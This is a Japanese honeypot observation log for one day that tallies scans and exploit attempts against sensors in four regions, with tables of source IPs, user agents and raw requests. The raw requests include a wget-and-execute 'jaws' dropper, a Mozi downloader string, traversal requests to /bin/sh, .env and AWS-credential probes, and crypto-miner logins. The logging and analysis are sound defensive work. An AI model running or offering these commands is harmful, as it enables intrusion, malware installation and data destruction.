ハニーポット(仮) 観測記録 2023/07/24分です。
特徴
共通
/.envへのスキャン行為
/.gitへのスキャン行為
Location:JP
F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
.jsへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 212.8.251.176/jaws; sh /tmp/jaws
Location:US
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 212.8.251.176/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget testbots.maizhangyu.top/jaws; sh /tmp/jaws
Location:UK
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
aiohttpによるスキャン行為
zgrabによるスキャン行為
/.awsへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
Gh0stRATのような動き
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 212.8.251.176/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget testbots.maizhangyu.top/jaws; sh /tmp/jaws
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.awsへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 212.8.251.176/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget 109.122.221.134/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:92 (前日比:-19)
US:総アクセス数:107 (前日比:0)
UK:総アクセス数:94 (前日比:9)
SG:総アクセス数:105 (前日比:17)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 18.234.223.50 | United States |
| 1 | 20.51.255.99 | United States |
| 2 | 20.172.37.23 | United States |
| 1 | 31.220.3.140 | Germany |
| 16 | 43.154.141.71 | Singapore |
| 1 | 44.200.116.230 | United States |
| 1 | 45.33.80.243 | United States |
| 1 | 45.56.108.128 | United States |
| 2 | 45.128.232.176 | Bulgaria |
| 1 | 45.156.129.7 | Hungary |
| 1 | 51.159.214.49 | France |
| 1 | 61.140.74.153 | China |
| 1 | 74.82.47.2 | United States |
| 4 | 80.82.77.33 | United Kingdom |
| 1 | 91.191.209.206 | Bulgaria |
| 2 | 104.192.0.50 | United States |
| 2 | 109.237.97.180 | Russia |
| 2 | 109.237.98.226 | Russia |
| 2 | 109.237.98.235 | Russia |
| 1 | 110.43.84.21 | China |
| 1 | 125.41.102.245 | China |
| 5 | 135.125.246.110 | France |
| 8 | 135.125.246.189 | France |
| 1 | 141.98.6.120 | Bulgaria |
| 1 | 143.110.169.71 | United States |
| 1 | 156.219.137.247 | Egypt |
| 1 | 162.142.125.216 | United States |
| 1 | 163.172.68.76 | United Kingdom |
| 5 | 164.90.223.27 | United States |
| 1 | 167.94.138.51 | United States |
| 1 | 167.94.145.57 | United States |
| 2 | 184.105.247.194 | United States |
| 2 | 185.132.39.83 | United Kingdom |
| 1 | 185.170.144.3 | Estonia |
| 1 | 185.225.74.92 | Bulgaria |
| 6 | 185.254.196.173 | Ukraine |
| 3 | 185.254.196.186 | Ukraine |
| 1 | 192.155.90.118 | United States |
| 1 | 193.26.115.22 | Netherlands |
| 1 | 197.53.54.209 | Egypt |
| 2 | 198.24.151.215 | United States |
| 1 | 198.235.24.126 | United States |
| 1 | 205.210.31.33 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 20 | - |
| 4 | Go-http-client/1.1 |
| 2 | Mozilla 5/0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 |
| 16 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 |
| 3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 |
| 29 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 3 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 1 | Mozilla/5.0 |
| 1 | Python-urllib/3.9 |
| 1 | python-requests/2.25.1 |
| 1 | python-requests/2.28.1 |
| 2 | python-requests/2.31.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ |
HTTP/1.0 | |
| 2 | \x03 |
||
| 2 | \x16\x03\x01\x01H\x01 |
||
| 1 | \x16\x03\x01\x01\xfa\x01 |
||
| 8 | \x16\x03\x01 |
||
| 2 | CONNECT | google[.]com:443 |
HTTP/1.1 |
| 32 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/HEAD |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /.svn/wc.db |
HTTP/1.1 |
| 1 | GET | /.well-known/security.txt |
HTTP/1.1 |
| 1 | GET | /?%3Cplay%3Ewithme%3C/%3E |
HTTP/1.1 |
| 1 | GET | /bundle.js |
HTTP/1.1 |
| 1 | GET | /client/get_targets |
HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 7 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /files/ |
HTTP/1.1 |
| 1 | GET | /geoserver/web/ |
HTTP/1.1 |
| 1 | GET | /robots.txt |
HTTP/1.1 |
| 3 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws |
|
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /systembc/password.php |
HTTP/1.0 |
| 2 | GET | /v3/time |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/phpunit.xml |
HTTP/1.1 |
| 16 | HEAD | /Core/Skin/Login.aspx |
HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /mgmt/tm/util/bash |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 36.225.130.119 | Taiwan |
| 1 | 41.237.226.134 | Egypt |
| 2 | 41.239.210.54 | Egypt |
| 1 | 45.79.128.205 | United States |
| 2 | 45.79.172.21 | United States |
| 1 | 45.79.181.94 | United States |
| 3 | 45.79.181.104 | United States |
| 1 | 45.79.181.223 | United States |
| 1 | 45.79.181.251 | United States |
| 2 | 45.128.232.176 | Bulgaria |
| 23 | 54.37.79.75 | France |
| 1 | 54.194.205.29 | United States |
| 1 | 65.49.1.14 | United States |
| 4 | 80.82.77.33 | United Kingdom |
| 1 | 89.185.31.9 | Ukraine |
| 1 | 107.170.240.57 | United States |
| 1 | 109.237.97.180 | Russia |
| 2 | 109.237.98.226 | Russia |
| 1 | 120.85.115.175 | China |
| 2 | 141.98.6.35 | Bulgaria |
| 1 | 156.199.242.204 | Egypt |
| 1 | 156.214.231.35 | Egypt |
| 1 | 156.223.196.135 | Egypt |
| 10 | 157.230.3.124 | United States |
| 1 | 159.203.192.15 | United States |
| 2 | 162.142.125.215 | United States |
| 1 | 163.172.68.76 | United Kingdom |
| 2 | 167.94.138.126 | United States |
| 1 | 168.181.158.2 | Brazil |
| 1 | 172.104.11.4 | United States |
| 1 | 172.104.11.34 | United States |
| 2 | 172.104.11.46 | United States |
| 1 | 178.62.25.26 | United States |
| 2 | 184.105.247.252 | United States |
| 1 | 185.170.144.3 | Estonia |
| 1 | 185.180.143.80 | Portugal |
| 1 | 185.224.128.151 | Netherlands |
| 1 | 185.225.74.92 | Bulgaria |
| 2 | 197.49.21.84 | Egypt |
| 2 | 197.49.133.207 | Egypt |
| 1 | 197.55.148.147 | Egypt |
| 1 | 198.235.24.129 | United States |
| 1 | 205.210.31.92 | United States |
| 4 | 207.90.244.10 | United States |
| 1 | 213.108.199.49 | Seychelles |
| 12 | 213.109.202.66 | United Kingdom |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 46 | - |
| 3 | Go-http-client/1.1 |
| 1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 |
| 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 25 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 3 | Mozilla/5.0 zgrab/0.x |
| 3 | Mozilla/5.0 |
| 1 | python-requests/2.25.1 |
| 1 | python-requests/2.28.1 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x03 |
||
| 1 | \x16\x03\x01\x01H\x01 |
||
| 1 | \x16\x03\x01\x01\xfb\x01 |
||
| 21 | \x16\x03\x01 |
||
| 1 | \xa9&;\xfe\x8bIS\x84e\xa5\xa9\xa6\tf\x86\xd6\x8d7\xd6D\x91\"\x9f\xff\xa1&\xee\xa2\x11\x88\xb3\x9a\xe8\xbe\xb6\x83\xe24&\x06\x7f\xd0\xd5\xf5c\xe84,x |
\xc7\xea\x82`\xc3\xea\xb3x\x1c}\xf4\xeb\x86\x9dp(\xec\x10\x94H\x02\xac\xf1\xbd\xe1\xc7\xd7g\x94\x0c\xd5 | |
| 2 | CONNECT | google[.]com:443 |
HTTP/1.1 |
| 1 | CONNECT | www[.]apple[.]com:443 |
HTTP/1.1 |
| 26 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 2 | GET | /.well-known/security.txt |
HTTP/1.1 |
| 1 | GET | /1.php |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /?act=cl&ofid=9999999&uid=1&vid=1&lid=1&cid=1&pid=1_mt |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /bundle.js |
HTTP/1.1 |
| 1 | GET | /cdn-cgi/trace |
HTTP/1.1 |
| 1 | GET | /client/get_targets |
HTTP/1.1 |
| 1 | GET | /configs |
HTTP/1.1 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 1 | GET | /druid/index.html |
HTTP/1.1 |
| 7 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /files/ |
HTTP/1.1 |
| 1 | GET | /geoip/ |
HTTP/1.1 |
| 1 | GET | /geoserver/web/ |
HTTP/1.1 |
| 1 | GET | /geoserver |
HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 2 | GET | /robots.txt |
HTTP/1.1 |
| 11 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws |
|
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ testbots.maizhangyu.top/jaws;sh+/tmp/jaws |
|
| 2 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 1 | GET | /upl.php |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /HNAP1/ |
HTTP/1.0 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 2 | 45.79.172.21 | United States |
| 1 | 45.79.181.251 | United States |
| 2 | 45.128.232.176 | Bulgaria |
| 11 | 45.148.120.113 | Netherlands |
| 6 | 51.79.29.48 | Canada |
| 6 | 54.37.79.75 | France |
| 1 | 66.240.192.82 | United States |
| 1 | 84.54.51.12 | Bulgaria |
| 2 | 103.94.234.28 | private ip address |
| 1 | 104.28.226.8 | United States |
| 1 | 104.248.172.157 | United States |
| 1 | 113.118.73.138 | China |
| 1 | 118.126.124.10 | China |
| 1 | 138.68.81.206 | United States |
| 5 | 139.162.255.50 | Netherlands |
| 1 | 143.198.35.233 | United States |
| 2 | 156.198.164.180 | Egypt |
| 1 | 156.208.89.171 | Egypt |
| 1 | 157.230.99.127 | United States |
| 1 | 157.230.99.133 | United States |
| 2 | 172.104.11.4 | United States |
| 2 | 172.104.11.34 | United States |
| 2 | 172.104.11.46 | United States |
| 3 | 172.105.128.13 | United States |
| 10 | 179.43.191.162 | Panama |
| 5 | 181.214.147.185 | Lithuania |
| 1 | 182.117.76.133 | China |
| 2 | 184.105.247.195 | United States |
| 1 | 185.132.39.83 | United Kingdom |
| 1 | 185.224.128.151 | Netherlands |
| 1 | 192.99.9.171 | Canada |
| 1 | 192.241.206.6 | United States |
| 1 | 198.199.95.64 | United States |
| 1 | 205.210.31.149 | United States |
| 1 | 205.210.31.250 | United States |
| 12 | 213.109.202.66 | United Kingdom |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 37 | - |
| 3 | FooBarTest |
| 4 | Go-http-client/1.1 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0 |
| 12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 |
| 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 |
| 14 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333) |
| 2 | Mozilla/5.0 zgrab/0.x |
| 3 | Mozilla/5.0 |
| 1 | Python/3.6 aiohttp/3.8.3 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | Gh0st\xad |
||
| 1 | HELP |
||
| 5 | \x03 |
||
| 1 | \x16\x03\x01\x01\x07\x01 |
||
| 1 | \x16\x03\x01\x01\xfc\x01 |
||
| 1 | \x16\x03\x01\x02 |
||
| 16 | \x16\x03\x01 |
||
| 1 | \x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n |
||
| 1 | \xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff\n |
||
| 1 | {\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"46FkXg88WbR7agH9oYwk67VanF6kgeYpgdzx6w5NYmNZc6BCXqC6rZmfmW4r4zArvEByt5Uy7yQw5B4ebHEmopKBLsjRgfQ\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3 |
(Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}\n | |
| 1 | {\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"igwrcvap\",\"params\":[\"0xdd3ebc4ae75c269e2e6ba55d3a526554f8dff373\",\"x\"],\"jsonrpc\":\"2.0\"}\n |
||
| 1 | {\"id\": |
1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}\n | |
| 1 | {\"id\": |
1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}\n | |
| 3 | CONNECT | google[.]com:443 |
HTTP/1.1 |
| 1 | CONNECT | www[.]apple[.]com:443 |
HTTP/1.1 |
| 1 | GET | /.aws/credentials |
HTTP/1.1 |
| 14 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /SiteLoader |
HTTP/1.1 |
| 1 | GET | /WuEL |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /a |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /admin/.env |
HTTP/1.1 |
| 1 | GET | /app/.env |
HTTP/1.1 |
| 1 | GET | /app/config/parameters.yml |
HTTP/1.1 |
| 1 | GET | /backend/.env |
HTTP/1.1 |
| 3 | GET | /cdn-cgi/trace |
HTTP/1.1 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 1 | GET | /download/file.ext |
HTTP/1.1 |
| 1 | GET | /druid/index.html |
HTTP/1.1 |
| 1 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /geoserver/web/ |
HTTP/1.1 |
| 1 | GET | /geoserver |
HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 1 | GET | /info.php |
HTTP/1.1 |
| 1 | GET | /laravel/.env |
HTTP/1.1 |
| 1 | GET | /mPlayer |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /prod/.env |
HTTP/1.1 |
| 3 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws |
|
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ testbots.maizhangyu.top/jaws;sh+/tmp/jaws |
|
| 1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 3 | GET | http[:]//test[.]getproxylist[.]com/ |
HTTP/1.1 |
| 1 | GET | stager64 |
HTTP/1.1 |
| 1 | HEAD | / |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /HNAP1/ |
HTTP/1.0 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 31.220.3.140 | Germany |
| 1 | 36.225.130.119 | Taiwan |
| 1 | 41.43.27.34 | Egypt |
| 1 | 45.56.108.128 | United States |
| 1 | 45.79.181.94 | United States |
| 3 | 45.79.181.104 | United States |
| 2 | 45.79.181.251 | United States |
| 2 | 45.128.232.176 | Bulgaria |
| 11 | 45.148.120.113 | Netherlands |
| 1 | 45.156.129.12 | Hungary |
| 9 | 51.79.29.48 | Canada |
| 11 | 54.37.79.75 | France |
| 1 | 65.49.1.98 | United States |
| 1 | 65.49.1.104 | United States |
| 1 | 71.166.44.14 | United States |
| 1 | 74.82.47.5 | United States |
| 1 | 80.66.88.211 | Russia |
| 2 | 84.54.51.12 | Bulgaria |
| 1 | 95.214.27.160 | Bulgaria |
| 1 | 105.158.205.98 | Morocco |
| 1 | 107.170.248.23 | United States |
| 1 | 110.43.84.21 | China |
| 1 | 137.117.121.68 | United States |
| 2 | 162.142.125.12 | United States |
| 2 | 162.142.125.216 | United States |
| 1 | 163.172.68.76 | United Kingdom |
| 2 | 167.94.145.58 | United States |
| 1 | 167.99.179.65 | United States |
| 2 | 167.248.133.50 | United States |
| 1 | 172.104.11.34 | United States |
| 2 | 172.105.128.11 | United States |
| 1 | 172.105.128.12 | United States |
| 10 | 179.43.191.162 | Panama |
| 1 | 185.180.143.140 | Portugal |
| 1 | 185.224.128.151 | Netherlands |
| 2 | 192.155.90.118 | United States |
| 1 | 192.241.225.32 | United States |
| 1 | 197.55.204.216 | Egypt |
| 1 | 198.235.24.245 | United States |
| 1 | 205.210.31.34 | United States |
| 4 | 207.90.244.10 | United States |
| 1 | 209.97.187.243 | United States |
| 12 | 213.109.202.66 | United Kingdom |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 32 | - |
| 5 | Go-http-client/1.1 |
| 1 | Hello, world |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 |
| 12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 |
| 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) |
| 21 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 4 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 1 | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333) |
| 2 | Mozilla/5.0 zgrab/0.x |
| 1 | Mozilla/5.0 |
| 1 | python-requests/2.31.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x03 |
||
| 1 | \x16\x03\x01\x01\xfb\x01 |
||
| 1 | \x16\x03\x01\x02 |
||
| 15 | \x16\x03\x01 |
||
| 1 | \x19+\xdbn\x04\x86~\x80\x82\xa6\xb0c$\x04\xdd~\xd7g\x04<\xd6:\xaf\xad\x065\xda\xec\x93\xa4;\x7ftS\x15k\x0f\v\x89\x84\xf8\xcd\x88\xb9\x14\x18\xf6\x04\xfc\x12\x04\xa2\xe4\xd4\xdey\xa3k\x19Y\xe45&\xfd\xcdH\xa2 |
||
| 1 | {\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"46FkXg88WbR7agH9oYwk67VanF6kgeYpgdzx6w5NYmNZc6BCXqC6rZmfmW4r4zArvEByt5Uy7yQw5B4ebHEmopKBLsjRgfQ\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3 |
